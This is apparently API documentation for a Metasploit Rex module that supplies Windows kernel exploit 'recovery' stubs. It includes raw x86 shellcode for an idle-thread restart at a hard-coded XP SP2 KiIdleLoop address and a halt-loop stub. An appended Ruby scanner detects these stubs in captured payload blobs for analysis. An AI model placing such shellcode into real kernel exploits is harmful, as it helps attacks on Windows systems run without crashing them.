module Rex::Payloads::Win32::Kernel::Recovery
Recovery stubs are responsible for ensuring that the kernel does not crash. They must 'recover' after the exploit has succeeded, either by consuming the thread or by continuing it with its normal execution. Recovery stubs will often be exploit dependent.
Public Class Methods
default(opts = {})
The default recovery method is to spin the thread
    # File lib/rex/payloads/win32/kernel/recovery.rb, line 17
    def self.default(opts = {})
      spin(opts)
    end
idlethread_restart(opts = {})
Restarts the idle thread by jumping back to the entry point of KiIdleLoop. This requires a hard-coded address of KiIdleLoop. You can pass the 'KiIdleLoopAddress' in the options hash.
    # File lib/rex/payloads/win32/kernel/recovery.rb, line 33
    def self.idlethread_restart(opts = {})
      # Default to fully patched XPSP2
      opts['KiIdleLoopAddress'] = 0x804dbb27 if opts['KiIdleLoopAddress'].nil?

      "\x31\xC0" +                                     # xor eax,eax
      "\x64\xC6\x40\x24\x02" +                         # mov byte [fs:eax+0x24],0x2
      "\x8B\x1D\x1C\xF0\xDF\xFF" +                     # mov ebx,[0xffdff01c]
      "\xB8" + [opts['KiIdleLoopAddress']].pack('V') + # mov eax, 0x804dbb27
      "\x6A\x00" +                                     # push byte +0x0
      "\xFF\xE0"                                       # jmp eax
    end
spin(opts = {})
Infinite 'hlt' loop.
    # File lib/rex/payloads/win32/kernel/recovery.rb, line 24
    def self.spin(opts = {})
      "\xf4\xeb\xfd"
    end
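As an added example (not Rex code) covering both the spin and idlethread_restart stubs above: a Ruby scanner that locates either stub in a captured kernel payload blob and recovers the KiIdleLoop address an idle-thread stub embeds, so an analyst can tell which recovery method a sample uses and which build it was cut for. The stub byte patterns come from the methods above; the sample blob and the function name find_recovery_stubs are constructed for this example.

```ruby
# Byte pattern of Recovery.spin: hlt, then jmp -3 back onto the hlt.
SPIN_STUB = "\xf4\xeb\xfd".b

# Recovery.idlethread_restart, split around the 4-byte 'mov eax, imm32' operand.
IDLE_PREFIX = ("\x31\xC0" +                 # xor eax,eax
               "\x64\xC6\x40\x24\x02" +     # mov byte [fs:eax+0x24],0x2
               "\x8B\x1D\x1C\xF0\xDF\xFF" + # mov ebx,[0xffdff01c]
               "\xB8").b                    # mov eax, imm32 (operand follows)
IDLE_SUFFIX = "\x6A\x00\xFF\xE0".b          # push byte 0 ; jmp eax
IDLE_LEN    = IDLE_PREFIX.bytesize + 4 + IDLE_SUFFIX.bytesize

# Scan a binary blob and return one hash per stub found:
#   { offset:, kind: :spin }                                  for the hlt loop
#   { offset:, kind: :idlethread_restart, target: <address> } for the idle restart,
# where target is the little-endian KiIdleLoop address embedded in the stub.
def find_recovery_stubs(blob)
  blob = blob.b
  hits = []
  i = 0
  while i < blob.bytesize
    if blob[i, SPIN_STUB.bytesize] == SPIN_STUB
      hits << { offset: i, kind: :spin }
      i += SPIN_STUB.bytesize
    elsif blob[i, IDLE_PREFIX.bytesize] == IDLE_PREFIX &&
          blob[i + IDLE_PREFIX.bytesize + 4, IDLE_SUFFIX.bytesize] == IDLE_SUFFIX
      # Only the prefix and suffix are matched; the address in between is variable.
      addr = blob[i + IDLE_PREFIX.bytesize, 4].unpack1('V')
      hits << { offset: i, kind: :idlethread_restart, target: addr }
      i += IDLE_LEN
    else
      i += 1
    end
  end
  hits
end

# Constructed sample: two NOPs, an idle-thread stub carrying the default XPSP2
# address from recovery.rb, an int3, then a spin stub.
SAMPLE_BLOB = "\x90\x90".b + IDLE_PREFIX + [0x804dbb27].pack('V') + IDLE_SUFFIX +
              "\xcc".b + SPIN_STUB

if __FILE__ == $PROGRAM_NAME
  find_recovery_stubs(SAMPLE_BLOB).each do |h|
    line = format('offset %d: %s', h[:offset], h[:kind])
    line << format(' -> KiIdleLoop 0x%08x', h[:target]) if h[:target]
    puts line
  end
end
```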